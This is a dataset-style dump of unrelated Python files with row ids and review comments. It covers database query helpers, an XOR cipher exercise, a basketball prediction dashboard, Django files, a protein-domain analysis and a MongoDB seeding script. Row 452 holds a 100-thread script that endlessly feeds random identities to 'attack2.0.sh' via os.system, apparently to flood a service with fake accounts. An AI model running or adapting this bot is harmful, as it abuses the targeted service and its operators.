        SubsidyProcessRecord.pay_record_id,
        SubsidyProcessRecord.processed_at).\
        filter(SubsidyProcessRecord.pay_record_id.in_(record_ids)).\
        filter(SubsidyProcessRecord.status == status).all()


def get_pay_activities_by_restaurant(rst_id):
    """Distinct (activity_id, activity_category_id) pairs with stats for
    the given restaurant.
    """
    with zeus_session() as session:
        query = session.query(
            ActivityStats.activity_id,
            ActivityStats.activity_category_id,). \
            group_by(ActivityStats.activity_id,
                     ActivityStats.activity_category_id). \
            filter(ActivityStats.restaurant_id == rst_id)

        return query.all()
# javis model begins
def query_sms_send_info(start_time=None, end_time=None, phone=None,
                        restaurant_id=None, card_num_tail=None, status=None):
    """Payment-notice SMS records matching the given filters.

    The time window defaults to today's [begin, end); the remaining
    filters are applied only when truthy.
    """
    with walis_session() as session:
        query = session.query(NoticeRecord)

        if phone:
            query = query.filter(NoticeRecord.phone == phone)

        if restaurant_id:
            query = query.filter(NoticeRecord.restaurant_id == restaurant_id)

        if card_num_tail:
            query = query.filter(NoticeRecord.card_num_tail == card_num_tail)

        if status:
            query = query.filter(NoticeRecord.status == status)

        if not start_time:
            start_time = get_today_begin_time()

        if not end_time:
            end_time = get_today_end_time()

        # Strict inequalities: records exactly at the boundary timestamps
        # are excluded.
        query = query.filter(NoticeRecord.created_at > start_time).\
            filter(NoticeRecord.created_at < end_time)

        return query.all()


def query_sms_send_count(start_time=None, end_time=None, status=None):
    """Count payment-notice SMS records in the window (defaults to today),
    optionally restricted to one status.
    """
    with walis_session() as session:
        if not start_time:
            start_time = get_today_begin_time()

        if not end_time:
            end_time = get_today_end_time()

        query = session.query(func.count(NoticeRecord.record_id)).\
            filter(NoticeRecord.created_at > start_time).\
            filter(NoticeRecord.created_at < end_time)

        if status is not None:
            query = query.filter(NoticeRecord.status == status)

        return query.scalar()
@zeus_db_handler
def query_auto_pay_activity_stats_result(
        city_ids=None, restaurant_ids=None, activity_id=None,
        activity_category_id=None, from_date=None, to_date=None, statuses=None,
        offset=None, limit=None, with_subsidy=None):
    """Per-(restaurant, activity, category) subsidy totals for auto-pay.

    Builds the grouped base query and delegates the shared filtering and
    paging to _query_activity_stats.  ``session`` is injected by
    @zeus_db_handler.
    """
    q = session.query(ActivityStats.restaurant_id,
                      ActivityStats.activity_id,
                      ActivityStats.activity_category_id,
                      func.sum(ActivityStats.quantity),
                      func.sum(ActivityStats.total_subsidy),
                      func.min(ActivityStats.date),
                      func.max(ActivityStats.date)).\
        group_by(ActivityStats.restaurant_id,
                 ActivityStats.activity_id,
                 ActivityStats.activity_category_id).\
        order_by(ActivityStats.restaurant_id.desc())

    return _query_activity_stats(
        q, city_ids, restaurant_ids, activity_id,
        activity_category_id, from_date, to_date, statuses,
        with_subsidy, offset, limit)
def _query_activity_stats(
        q, city_ids=None, restaurant_ids=None, activity_id=None,
        activity_category_id=None, from_date=None, to_date=None, statuses=None,
        with_subsidy=None, offset=None, limit=None):
    """Apply the shared ActivityStats filters and paging to query *q*.

    Each filter is optional and applied only when its argument is given;
    ``with_subsidy`` selects rows with (True) or without (False) subsidy.
    """
    if activity_id is not None:
        q = q.filter(ActivityStats.activity_id == activity_id)

    if activity_category_id is not None:
        q = q.filter(ActivityStats.activity_category_id == activity_category_id)  # noqa

    if city_ids is not None:
        q = q.filter(ActivityStats.city_id.in_(city_ids))

    if restaurant_ids is not None:
        q = q.filter(ActivityStats.restaurant_id.in_(restaurant_ids))

    if from_date is not None:
        q = q.filter(ActivityStats.date >= from_date)

    if to_date is not None:
        q = q.filter(ActivityStats.date <= to_date)

    if statuses is not None:
        q = q.filter(ActivityStats.status.in_(statuses))

    if with_subsidy is not None:
        if with_subsidy:
            q = q.filter(ActivityStats.total_subsidy > 0)
        else:
            q = q.filter(ActivityStats.total_subsidy == 0)

    if offset is not None:
        q = q.offset(offset)

    # BUG FIX: honour the caller-supplied ``limit`` (capped at
    # MAX_LIST_SIZE) -- it was previously accepted but ignored in favour
    # of a hard-coded limit(1000).  ``limit=None`` keeps the old 1000 cap.
    if limit is not None:
        q = q.limit(min(limit, MAX_LIST_SIZE))
    else:
        q = q.limit(MAX_LIST_SIZE)

    return q
|
451 | a32fb683f8d46f901e8dcd2d075ace22ee81e076 | import base64
import string
def hexStringtoBytes(hexstring):
    """Decode a hexadecimal string into the bytes object it encodes."""
    return bytes.fromhex(hexstring)
def xorBytes(bytes1, bytes2):
    """XOR two byte sequences position-wise.

    Iterates over the length of ``bytes1``; a shorter ``bytes2`` raises
    IndexError, matching plain index semantics.
    """
    return bytes(bytes1[i] ^ bytes2[i] for i in range(len(bytes1)))
def xorAgainstCharacter(byteArray, character):
    """XOR every byte of *byteArray* with the single key *character*."""
    keystream = [ord(character)] * len(byteArray)
    return xorBytes(byteArray, keystream)
def scoreString(data):
    """Count how many bytes of *data* decode to printable ASCII.

    Serves as a crude plaintext score when brute-forcing single-byte XOR.
    (Renamed the parameter from ``input``, which shadowed the builtin, and
    replaced the bool-list + count(True) pattern with a direct sum.)
    """
    return sum(chr(b) in string.printable for b in data)
if __name__ == "__main__":
    # Cryptopals-style exercise: break a single-byte XOR cipher.
    hexstring = '1b37373331363f78151b7f2b783431333d78397828372d363c78373e783a393b3736'
    bytes1 = hexStringtoBytes(hexstring)
    scores = []
    # Try every printable character as the key and score each candidate.
    for x in string.printable:
        temp = xorAgainstCharacter(bytes1, x)
        print(str(x), str(temp))
        scores.append(scoreString(temp))
        # NOTE(review): ``scores`` is collected but never used to pick the
        # best key -- presumably the winner was read off the printout.
|
452 | b9c058bdb04df93beb379d05939b00f4db423cd3 | import string
import random
import os
from threading import Thread
class Process(Thread):
    """Worker thread that endlessly invokes attack2.0.sh with random
    identities.

    NOTE(review): combined with the 100-thread spawner below, this
    automates bulk fake-account creation against some target.  Flagged as
    abusive tooling; no functional improvements are proposed.
    """

    def __init__(self):
        Thread.__init__(self)

    def run(self):
        # Infinite loop (Python 2 syntax): fabricate a random identity and
        # pass it to the shell script via os.system.
        while True:
            prenom = id_generator(random.randint(4, 8))
            nom = id_generator(random.randint(4, 8))
            password = id_generator(random.randint(4, 8))
            mail = id_generator(random.randint(4, 8)) + '.' + id_generator(random.randint(4, 8))
            command = "sh attack2.0.sh " + prenom + " " + mail + " " + nom + " " + password
            os.system(command)
            print "\n" + mail
def id_generator(size=6, chars=string.ascii_lowercase + string.digits):
    """Build a random identifier of *size* characters drawn from *chars*."""
    picked = (random.choice(chars) for _ in range(size))
    return ''.join(picked)
# Spawn 100 Process workers, each looping forever.  Threads are never
# joined or stopped; the process must be killed externally.
i = 0
while i < 100:
    thread_1 = Process()
    thread_1.start()
    i = i + 1
|
453 | 9b581df505765e895047584c5bb586faef95295f | import dash
import dash_core_components as dcc
import dash_html_components as html
import dash_table as dt
import plotly.express as px
import pandas as pd
import plotly.graph_objects as go
import numpy as np
from datetime import datetime as dat
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LinearRegression
from sklearn import metrics
from sklearn.feature_selection import f_regression
from sklearn.feature_selection import SelectKBest
# TODO:
# The model doesn't really take the opponent into consideration when calculating the win percentage. As you would expect, this is not ideal and is something that needs to be fixed
#
# The bar charts only graph 2019 data. Allowing the user to choose the year would be an easy addition. Future implementations could also include a previous X games option instead
#
# The bar chart only graphs stats correctly if they are selected in order. For example, if the set of possible stats are ['assists', 'rebounds', 'blocks'], they must all be selected
# in order to show all the values correctly. If the user selects only 'assists' and 'blocks' then 'assists' graphs correctly. 'blocks' is graphed but is given the value assigned
# to 'rebounds' because it assumes the second position in the array of stats to be graphed.
#
# The model doesn't run well (and generally fails) for small schools due to a lack of data for those teams. Error checking needs to be implemented to eliminate this problem.
def getStatsByYear(teamID, year, data):
    ''' Returns the stats for a chosen team for a specific year. Choices are 2016 - 2019 '''
    teamStats = data[data["team_id"] == teamID]
    # BUG FIX: filter the team's rows directly on the requested year.  The
    # previous code indexed ``teamStats`` with a boolean mask built from
    # ``data`` inside a row loop, which relies on index alignment and did
    # a full scan per row.
    teamStatsForGivenYear = teamStats[teamStats["season"] == year]
    if teamStatsForGivenYear.empty:
        # Preserve the old behaviour of returning None when the team has
        # no rows for that season.
        return None
    return teamStatsForGivenYear
def generate_bar_chart(team, opponent, stats, stat_names, data):
    ''' Generates a bar chart for a the user selected team, opponent and stats

    ``stats`` holds the selected indices into ``stat_names``; averages of
    the 2019 season are plotted for both teams (see module TODO about
    letting the user pick the year).
    '''
    teamStats = getStatsByYear(team, 2019, data)
    opponentStats = getStatsByYear(opponent, 2019, data)

    # NOTE(review): this column list is duplicated immediately below and
    # elsewhere in the module; a shared constant would keep them in sync.
    teamStatValues = teamStats[["assists", "assists_turnover_ratio", "blocked_att", "blocks", "defensive_rebounds", "fast_break_pts",
                                "field_goals_att", "field_goals_pct", "field_goals_made", "free_throws_att",
                                "free_throws_pct", "free_throws_made", "offensive_rebounds", "personal_fouls",
                                "points", "points_against", "points_in_paint", "points_off_turnovers",
                                "rebounds", "second_chance_pts", "steals", "team_rebounds", "three_points_att",
                                "three_points_pct", "three_points_made", "turnovers", "two_points_att",
                                "two_points_pct", "two_points_made"
                                ]]

    opponentStatValues = opponentStats[["assists", "assists_turnover_ratio", "blocked_att", "blocks", "defensive_rebounds", "fast_break_pts",
                                        "field_goals_att", "field_goals_pct", "field_goals_made", "free_throws_att",
                                        "free_throws_pct", "free_throws_made", "offensive_rebounds", "personal_fouls",
                                        "points", "points_against", "points_in_paint", "points_off_turnovers",
                                        "rebounds", "second_chance_pts", "steals", "team_rebounds", "three_points_att",
                                        "three_points_pct", "three_points_made", "turnovers", "two_points_att",
                                        "two_points_pct", "two_points_made"
                                        ]]

    # Keep only the stat names whose index was selected (see module TODO
    # about selection-order sensitivity).
    stats_to_be_graphed = []
    for i in range(len(stat_names)):
        if i in stats:
            stats_to_be_graphed.append(stat_names[i])

    # Graphs average stat values for the user's chosen team
    teamVals = go.Bar(
        x = stats_to_be_graphed,
        y = teamStatValues.mean(),
        name = data[(data.team_id == team)]['market'].iloc[0]
    )

    # Graphs average stat values for the opponent's team
    opponentVals = go.Bar(
        x = stats_to_be_graphed,
        y = opponentStatValues.mean(),
        name = data[(data.team_id == opponent)]['market'].iloc[0]
    )

    # NOTE(review): rebinding ``data`` here shadows the DataFrame
    # parameter of the same name for the rest of the function.
    data = [teamVals, opponentVals]
    layout = go.Layout(barmode = 'group')
    fig = go.Figure(data = data, layout = layout)

    return fig
def getAllTeamMatchRecords(teamID, df):
    ''' Returns all game records for a given teamID '''
    team_mask = df["team_id"] == teamID
    return df[team_mask]
def select_features(X_train, y_train, X_test):
    ''' Selects features

    Scores every feature with a univariate F-test; because k='all' the
    transforms keep every column, so the fitted ``fs`` object (with its
    per-feature ``scores_``) is the useful output.
    '''
    # configure to select all features
    fs = SelectKBest(score_func=f_regression, k='all')
    # learn relationship from training data
    fs.fit(X_train, y_train)
    # transform train input data
    X_train_fs = fs.transform(X_train)
    # transform test input data
    X_test_fs = fs.transform(X_test)
    return X_train_fs, X_test_fs, fs
def overallFeatures(df):
    ''' Return list of top four features ranked by univariate F-test score.

    BUG FIX: ``fillna(0)`` returns a new frame; the previous code
    discarded the result and selected features on the original (possibly
    NaN-containing) data.
    '''
    datasetForFS = df.fillna(0)

    X1 = datasetForFS[["assists","blocks","defensive_rebounds","opponent_drb","fast_break_pts","points_in_paint","points_off_turnovers","rebounds","steals","turnovers","efg","tov_pct","orb_pct","ftr"]]
    y1 = datasetForFS['win']

    X_train, X_test, y_train, y_test = train_test_split(X1, y1, test_size=0.2, random_state=0)
    X_train_fs, X_test_fs, fs = select_features(X_train, y_train, X_test)

    # Rank features by their F-score and keep the four best names.
    colList = X1.columns.values.tolist()
    statScoreDF = pd.DataFrame(data={'Stat': pd.Series(colList), 'Score': pd.Series(fs.scores_.tolist())})
    statScoreDF = statScoreDF.sort_values(by=['Score'], ascending=False)

    return statScoreDF.head(n=4)['Stat'].tolist()
def avgDataRow(df):
    ''' Returns a one-row DataFrame holding the column-wise means of *df*.

    Uses a comprehension over ``df.columns`` instead of the deprecated
    ``DataFrame.iteritems()`` (removed in pandas 2.0); column order is
    preserved.
    '''
    means = {col: [df[col].mean()] for col in df.columns}
    return pd.DataFrame(means)
def updateWinPct(dfMain, dfWin, reg):
    ''' Return new win percentage

    Predicts on *dfMain* with the fitted regressor *reg* and returns a
    DataFrame holding the actual mean win rate plus the rounded and raw
    predictions.
    '''
    predicted = reg.predict(dfMain)
    rounded = np.around(predicted)
    return pd.DataFrame({
        'Actual': dfWin.mean(),
        'Predicted (int)': rounded,
        'Predicted (float)': predicted,
    })
def filterRowsFS(df):
    ''' Restrict *df* to the fixed feature-selection column set. '''
    fs_columns = ["assists","blocks","defensive_rebounds","opponent_drb","fast_break_pts","points_in_paint","points_off_turnovers","rebounds","steals","turnovers","efg","tov_pct","orb_pct","ftr"]
    return df[fs_columns]
def learn(dataset):
    ''' Trains the linear-regression win model.

    BUG FIX: the ``dataset`` argument was previously discarded and the CSV
    was always re-read.  A passed-in DataFrame is now used; the CSV
    remains the fallback for ``learn(None)``.

    Returns (fitted_regressor, evaluation_dataframe).
    '''
    if dataset is None:
        dataset = pd.read_csv("team_boxscores_v3.csv")
    dataset = dataset.fillna(0)

    # Shuffle so the 80/20 split below is not biased by row order.
    dataset = dataset.sample(frac = 1)

    X1 = dataset[["assists","blocks","defensive_rebounds","opponent_drb","fast_break_pts","points_in_paint","points_off_turnovers","rebounds","steals","turnovers","efg","tov_pct","orb_pct","ftr"]]
    y1 = dataset['win']

    # Hold out the first fifth of the shuffled rows as the test set.
    cut = int(len(X1) / 5)
    X_train = X1[cut:]
    X_test = X1[:cut]
    y_train = y1[cut:]
    y_test = y1[:cut]

    regressor = LinearRegression()
    regressor.fit(X_train, y_train)

    # (The unused coefficient table was removed; predict once and round.)
    y_pred = regressor.predict(X_test)
    y_pred_round = np.around(y_pred)

    return regressor, pd.DataFrame({'Actual': y_test, 'Predicted (int)': y_pred_round, 'Predicted (float)': y_pred})
def calculate_win_percentage(team, stat1, stat2, stat3, stat4, regressor, data):
    ''' Calculates the win percentage for a team and the 4 selected stat values

    stat1..stat4 override the team's average values for its four most
    predictive features (as ranked by overallFeatures).
    '''
    temp = getAllTeamMatchRecords(team, data)

    # PERF FIX: overallFeatures() re-runs feature selection (a model fit)
    # on every call; the previous code invoked it four times for one list.
    top_stats = overallFeatures(temp)

    average_team_stats = avgDataRow(filterRowsFS(temp))
    dfWin = temp["win"]

    # Override the four most predictive stats with the requested values.
    # (The unused origWinPct/dfFinal computation was removed -- it cost
    # two extra predictions and its result was never read.)
    average_team_stats.at[0, top_stats[0]] = stat1
    average_team_stats.at[0, top_stats[1]] = stat2
    average_team_stats.at[0, top_stats[2]] = stat3
    average_team_stats.at[0, top_stats[3]] = stat4

    win_percentage = updateWinPct(average_team_stats, dfWin, regressor).at[0,'Predicted (float)']

    # Makes sure you can't have a win percentage of > 100% or < 0%
    if win_percentage > 1:
        win_percentage = 1
    elif win_percentage < 0:
        win_percentage = 0

    win_percentage = win_percentage * 100
    win_percentage = round(win_percentage, 2)

    win_percentage_text = "Projected Win Percentage: " + str(win_percentage) + "%"

    return win_percentage_text
def get_default_slider_values(team, data):
    ''' Gets the values the each of the 4 sliders should display. These values are what the model estimates the team will get in the matchup '''
    numSliders = 4

    # PERF FIX: fetch the team's records and run feature selection once;
    # the previous code re-queried and re-fit a model inside the loop for
    # every slider.
    records = getAllTeamMatchRecords(team, data)
    estimated_stat_values = avgDataRow(filterRowsFS(records))
    stat_column_names = overallFeatures(records)[:numSliders]

    stat_column_values = [estimated_stat_values.at[0, name]
                          for name in stat_column_names]

    return stat_column_names, stat_column_values
454 | fdcee5b3f6b3ec170c9ef3017e0cc6c4b28cf22d | from django.contrib import admin
from .models import Advert, Category, ImageAd
@admin.register(Advert)
class AdminAdvert(admin.ModelAdmin):
    # Dual-pane picker for the Advert<->Category many-to-many; the
    # trailing comma makes this a one-element tuple.
    filter_horizontal = "categories",


@admin.register(Category)
class AdminCategory(admin.ModelAdmin):
    # Default admin behaviour.
    pass


@admin.register(ImageAd)
class AdminImageAd(admin.ModelAdmin):
    # Default admin behaviour.
    pass
|
455 | ae5f87f1c383478ea5f370af1c85d63a472a7788 | #Array In Python
# Demonstrates the stdlib ``array`` type: a compact, homogeneous sequence.
from array import array

# "i" -> C signed-int elements; contents must all be ints.
numbers = array("i",[1,2,3])
# Supports list-style item assignment.
numbers[0] = 0
# Convert to a plain list for readable printing.
print(list(numbers))
456 | 9c05b39a12ab29db99397e62315efddd8cdf1df4 | dict1 = [
{'a':1},
{'a':2},
{'a':3}
]
a = dict1[1]['a']
# print(a)

# Maps placeholder tokens to their resolved values.
correlation_dict = {'${class_id}':123}
data = {'token': '${self.token}', 'name': 'apiๆต่ฏ','class_id': '${class_id}'}

# Replace placeholder values in ``data`` with entries from correlation_dict.
for k in data:
    for key in correlation_dict:
        # NOTE(review): substring membership test -- equality
        # (data[k] == key) is probably what was meant; confirm before
        # relying on partial-token matches.
        if data[k] in key:
            data[k] = correlation_dict[key]

print(data)
|
457 | 2467825d2cb01c86d3ba27562decc12551877af1 | """
Script: coverage.py
Identifies domains that only occur in multi-domain proteins. The main
script is master.
--------------------
Felix A Kruger
momo.sander@ebi.ac.uk
"""
####
#### import modules.
####
import queryDevice
import operator
import yaml
import time
####
#### Load parameters.
####
paramFile = open('local.yaml')
params = yaml.safe_load(paramFile)
paramFile.close()
#### Define functions.
#-----------------------------------------------------------------------------------------------------------------------
def get_el_targets(params):
    """Query the ChEMBL database for (almost) all activities that are
    subject to the mapping.  Does not cover activities expressed in
    log-conversion, e.g. pIC50.  Works with chembl_15 upwards.  Returns a
    list of tuples [(tid, target_type, domain_count, assay_count,
    act_count), ...].
    """
    # NOTE(review): the threshold appears to be in uM (multiplied by 1000
    # to nM below) -- confirm against local.yaml.
    data = queryDevice.queryDevice("""
    SELECT DISTINCT dc.tid, dc.target_type, dc.dc, COUNT(DISTINCT act.assay_id), COUNT(DISTINCT activity_id)
    FROM assays ass
    JOIN(
    SELECT td.tid, td.target_type, COUNT(cd.domain_id) as dc
    FROM target_dictionary td
    JOIN target_components tc
    ON tc.tid = td.tid
    JOIN component_sequences cs
    ON cs.component_id = tc.component_id
    JOIN component_domains cd
    ON cd.component_id = cs.component_id
    WHERE td.target_type IN('SINGLE PROTEIN', 'PROTEIN COMPLEX')
    GROUP BY td.tid
    ) as dc
    ON dc.tid = ass.tid
    JOIN activities act
    ON act.assay_id = ass.assay_id
    WHERE act.standard_type IN('Ki','Kd','IC50','EC50', 'AC50')
    AND ass.relationship_type = 'D'
    AND assay_type IN('B')
    AND act.standard_relation IN('=')
    AND standard_units = 'nM'
    AND standard_value <= %s
    GROUP BY dc.tid ORDER BY COUNT(activity_id)""" % (int(params['threshold']) * 1000) , params)
    print "retrieved data for ", len(data), "tids."
    return data
#-----------------------------------------------------------------------------------------------------------------------
def readfile(path, key_name, val_name):
    """Read two columns from a tab-separated file into a dictionary.

    Inputs:
    path -- filepath
    key_name -- name of the column holding the key
    val_name -- name of the column holding the value
    """
    with open(path, 'r') as infile:
        lines = infile.readlines()
    header = lines[0].rstrip().split('\t')
    # Scan the header; if a name occurs twice the last match wins.
    for idx, column in enumerate(header):
        if column == key_name:
            key_idx = idx
        if column == val_name:
            val_idx = idx
    lkp = {}
    for line in lines[1:]:
        fields = line.rstrip().split('\t')
        lkp[fields[key_idx]] = fields[val_idx]
    return lkp
#-----------------------------------------------------------------------------------------------------------------------
def get_archs(el_targets, pfam_lkp):
"""Find multi-domain architectures.
Inputs:
el_targets -- list of eligible targets
"""
act_lkp = {}
arch_lkp = {}
dom_lkp = {}
for ent in el_targets:
try:
doms = pfam_lkp[ent[0]]
except KeyError:
print "no doms in ", ent[0]
arch = ', '.join(sorted(doms))
try:
arch_lkp[arch] += 1
act_lkp[arch] += ent[4]
except KeyError:
arch_lkp[arch] = 1
act_lkp[arch] = ent[4]
if len(doms) <= 1:
continue
for dom in set(doms):
try:
dom_lkp[dom] += 1
except KeyError:
dom_lkp[dom] = 1
return(arch_lkp, dom_lkp, act_lkp)
#-----------------------------------------------------------------------------------------------------------------------
def get_doms(tids, params):
    """Get Pfam-A domains for a list of tids.

    Inputs:
    tids -- list of target ids to look up
    params -- connection parameters passed through to queryDevice
    Returns a dict mapping tid -> list of domain names.
    """
    pfam_lkp = {}
    tidstr = "', '".join(str(t) for t in tids)
    data = queryDevice.queryDevice("""
    SELECT tid, domain_name
    FROM target_components tc
    JOIN component_domains cd
    ON cd.component_id = tc.component_id
    JOIN domains d
    ON d.domain_id = cd.domain_id
    WHERE tc.tid IN('%s') and domain_type = 'Pfam-A'""" %tidstr, params)
    for ent in data:
        tid = ent[0]
        dom = ent[1]
        # Accumulate one domain list per target.
        try:
            pfam_lkp[tid].append(dom)
        except KeyError:
            pfam_lkp[tid] = [dom]
    return pfam_lkp
#-----------------------------------------------------------------------------------------------------------------------
def count_valid(lkp, valid_doms):
    """Get count of architectures and activities covered by the mapping.

    Appends a timestamped coverage row to data/log.tab.  An architecture
    counts as covered when at least one of its domains is validated.
    """
    valz = []
    for arch in lkp.keys():
        valid = False
        doms = arch.split(', ')
        for dom in doms:
            if dom in valid_doms:
                valid = True
                break
        valz.append((lkp[arch], valid))
    valid = sum([x[0] for x in valz if x[1]])
    allz = sum([x[0] for x in valz])
    valid_archs = len([x[0] for x in valz if x[1]])
    # BUG FIX: was len(sum([...])), which raises TypeError (len of an
    # int); the total number of architectures is simply len(valz).
    all_archs = len(valz)
    out = open('data/log.tab', 'a')
    timestamp = time.strftime('%d %B %Y %T', time.gmtime())
    comment = "only binding assays"
    release = params['release']
    threshold = params['threshold']
    out.write("%(valid)s\t%(allz)s\t%(release)s\t%(threshold)s\t%(comment)s\t%(timestamp)s\t%(valid_archs)s\t%(all_archs)s\n"
              % locals())
    out.close()
#-----------------------------------------------------------------------------------------------------------------------
def export_archs(arch_lkp, valid_doms, path):
    '''Write out multi-domain architectures in markdown tables.
    Inputs:
    arch_lkp -- dictionary of multi-domain architectures.
    '''
    # items() replaces py2-only iteritems() (works on both); sorted by
    # count, descending.
    sorted_archs = sorted(arch_lkp.items(), key=operator.itemgetter(1), reverse=True)
    out = open('%s.md' % path, 'w')
    out.write('|architecture|count|mapped|\n')
    out.write('|:-----------|:---------|-----:|\n')
    for arch in sorted_archs:
        doms = str(arch[0]).split(', ')
        # Single-domain architectures are not listed.
        if len(doms) <= 1:
            continue
        mapped = ', '.join([x for x in doms if x in valid_doms])
        if len(mapped) == 0:
            mapped = False
        out.write("|%s|%s|%s|\n" % (arch[0], arch[1], mapped))
    # BUG FIX: the handle was never closed, so buffered rows could be lost.
    out.close()
#-----------------------------------------------------------------------------------------------------------------------
def export_network(arch_lkp, valid_doms, path):
    '''Write out network file.
    Inputs:
    arch_lkp -- dictionary of multi-domain architectures.

    Emits one tab-separated row per unordered domain pair, with the
    summed architecture counts of every architecture containing the pair.
    '''
    edge_counts = {}
    for arch, count in arch_lkp.items():
        doms = arch.split(', ')
        if len(doms) <= 1:
            continue
        if type(doms) is str:
            continue
        # Accumulate every unordered pair of domains in this architecture.
        for i in range(len(doms) - 1):
            for j in range(i + 1, len(doms)):
                edge = ', '.join(sorted([doms[i], doms[j]]))
                edge_counts[edge] = edge_counts.get(edge, 0) + count
    out = open('%s.tab' % path, 'w')
    out.write('dom_1\tdom_2\tcount\n')
    for edge, total in edge_counts.items():
        pair = str(edge).split(', ')
        out.write("%s\t%s\t%s\n" % (pair[0], pair[1], total))
    out.close()
#-----------------------------------------------------------------------------------------------------------------------
def export_attribs(arch_lkp, valid_doms, path):
    '''Write out network attribute file.
    Inputs:
    arch_lkp -- dictionary of multi-domain architectures.

    One row per domain occurring in a multi-domain architecture, tagged
    True/False depending on whether it is a validated domain.
    '''
    out = open('%s.tab' % path, 'w')
    out.write('dom\tvalid\n')
    validity = {}
    for arch in arch_lkp.keys():
        doms = arch.split(', ')
        if len(doms) <= 1:
            continue
        for dom in doms:
            validity[dom] = dom in valid_doms
    for dom, is_valid in validity.items():
        out.write("%s\t%s\n" % (dom, is_valid))
    out.close()
#-----------------------------------------------------------------------------------------------------------------------
def export_doms(dom_lkp, valid_doms, path):
    '''Write out identified domains in markdown tables.
    Inputs:
    dom_lkp -- dictionary of domains occurring in multi-domain architectures.
    '''
    # items() replaces py2-only iteritems() (works on both); sort by
    # count, descending.
    sorted_doms = sorted(dom_lkp.items(), key=operator.itemgetter(1), reverse=True)
    out = open('%s.md' % path, 'w')
    out.write('|domain |count| validated|\n')
    out.write('|:-----------|:-----|-------:|\n')
    for dom, count in sorted_doms:
        mapped = str(dom) in valid_doms
        out.write("|%s|%s|%s|\n" % (dom, count, mapped))
    # BUG FIX: close the handle so the table is flushed to disk.
    out.close()
#-----------------------------------------------------------------------------------------------------------------------
def master(version):
    """
    Function: master
    Run through all steps to identify mandatory multi-domain architectures.

    *version* selects which data/valid_pfam_v_<version>.tab file provides
    the validated-domain list; all outputs are written under data/ with
    the release taken from the module-level ``params``.
    """
    # Load the list of validated domains.
    valid_dom_d = readfile('data/valid_pfam_v_%(version)s.tab' % locals(), 'pfam_a', 'pfam_a')
    valid_doms = valid_dom_d.keys()
    ## Load eligible targets.
    el_targets = get_el_targets(params)
    ## Get domains for tids.
    pfam_lkp = get_doms([x[0] for x in el_targets], params)
    ## Add targets with given architecture.
    (arch_lkp, dom_lkp, act_lkp) = get_archs(el_targets, pfam_lkp)
    ## Count covered acrchitectures.
    count_valid(arch_lkp, valid_doms)
    ## Count covered activities.
    count_valid(act_lkp, valid_doms)
    ## Write multi-domain architechtures to markdown tables.
    export_archs(arch_lkp, valid_doms, 'data/multi_dom_archs_%s'% params['release'])
    ## Write domains from multi-domain architechtures to markdown tables.
    export_doms(dom_lkp, valid_doms, 'data/multi_dom_doms_%s'% params['release'])
    ## export network file.
    export_network(arch_lkp, valid_doms, 'data/multi_dom_network_%s'% params['release'])
    ## export network attribute file.
    export_attribs(arch_lkp, valid_doms, 'data/multi_dom_attributes_%s'% params['release'])
#-----------------------------------------------------------------------------------------------------------------------
if __name__ == '__main__':
    import sys

    # Expect exactly one CLI argument: the valid-Pfam file version.
    if len(sys.argv) != 2: # the program name and one argument
        sys.exit("""Parameters are read from mpf.yaml but must specify
                 version for data/valid_pfam_v_%(version)s.tab""")
    version = sys.argv[1]
    master(version)
|
458 | 51af54c55834c4bdb8e1cbe4ac55b86bdc61bf4d | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.utils.timezone import utc
import datetime
class Migration(migrations.Migration):
    # Auto-generated migration: renames Note.txtcolor -> Note.text and
    # freezes created_date's default to the timestamp captured when the
    # migration was generated (normal makemigrations behaviour for a
    # non-callable default).  Applied migrations should not be hand-edited.

    dependencies = [
        ('notesapp', '0008_auto_20150819_1222'),
    ]

    operations = [
        migrations.RenameField(
            model_name='note',
            old_name='txtcolor',
            new_name='text',
        ),
        migrations.AlterField(
            model_name='note',
            name='created_date',
            field=models.DateTimeField(default=datetime.datetime(2015, 8, 19, 12, 25, 8, 579538, tzinfo=utc), editable=False),
        ),
    ]
|
459 | a8b1b218e6649545000803c91c803580cfdbd4f1 | import random
# Imports MongoClient for base level access to the local MongoDB
from pymongo import MongoClient
# Imports datetime class to create timestamp for weather data storage
from datetime import datetime
# Importing DailyReportModel class to use the implemented method to insert data into daily_report_model collection
from model import DailyReportModel
# Database host ip and port information
HOST = '127.0.0.1'
PORT = '27017'
RELATIVE_CONFIG_PATH = '../config/'
DB_NAME = 'weather_db'
USER_COLLECTION = 'users'
DEVICE_COLLECTION = 'devices'
WEATHER_DATA_COLLECTION = 'weather_data'
DAILY_REPORT_MODEL = 'daily_report_model'
# This will initiate connection to the mongodb
db_handle = MongoClient(f'mongodb://{HOST}:{PORT}')
# We drop the existing database including all the collections and data
db_handle.drop_database(DB_NAME)
# We recreate the database with the same name
weather_dbh = db_handle[DB_NAME]
# user data import
# User document contains username (String), email (String), and role (String) fields
# Reads users.csv one line at a time, splits them into the data fields and inserts
with open(RELATIVE_CONFIG_PATH+USER_COLLECTION+'.csv', 'r') as user_fh:
    for user_row in user_fh:
        user_row = user_row.rstrip()
        # Skip blank lines (e.g. a trailing newline at end of file).
        if user_row:
            # NOTE(review): assumes exactly three comma-separated fields
            # and no commas inside values -- the csv module would be safer.
            (username, email, role) = user_row.split(',')
            user_data = {'username': username, 'email': email, 'role': role}
            # This creates and return a pointer to the users collection
            user_collection = weather_dbh[USER_COLLECTION]
            # This inserts the data item as a document in the user collection
            user_collection.insert_one(user_data)
# device data import
# Device document contains device_id (String), desc (String), type (String - temperature/humidity) and manufacturer (String) fields
# Reads devices.csv one line at a time, splits them into the data fields and inserts
with open(RELATIVE_CONFIG_PATH+DEVICE_COLLECTION+'.csv', 'r') as device_fh:
    for device_row in device_fh:
        device_row = device_row.rstrip()
        # Skip blank lines.
        if device_row:
            # NOTE(review): ``type`` shadows the builtin of the same name
            # for the remainder of this script.
            (device_id, desc, type, manufacturer) = device_row.split(',')
            device_data = {'device_id': device_id, 'desc': desc, 'type': type, 'manufacturer': manufacturer}
            # This creates and return a pointer to the devices collection
            device_collection = weather_dbh[DEVICE_COLLECTION]
            # This inserts the data item as a document in the devices collection
            device_collection.insert_one(device_data)
# weather data generation
# Weather data document contains device_id (String), value (Integer), and timestamp (Date) fields
# Reads devices.csv one line at a time to get device id and type. It then loops for five days (2020-12-01 to 2020-12-05
# For each device and day, it creates random values for each hour (at the 30 minute mark) and stores the data

#Created a list to populate it with device id and timestamp
devdaylist = []
with open(RELATIVE_CONFIG_PATH+DEVICE_COLLECTION+'.csv', 'r') as device_fh:
    for device_row in device_fh:
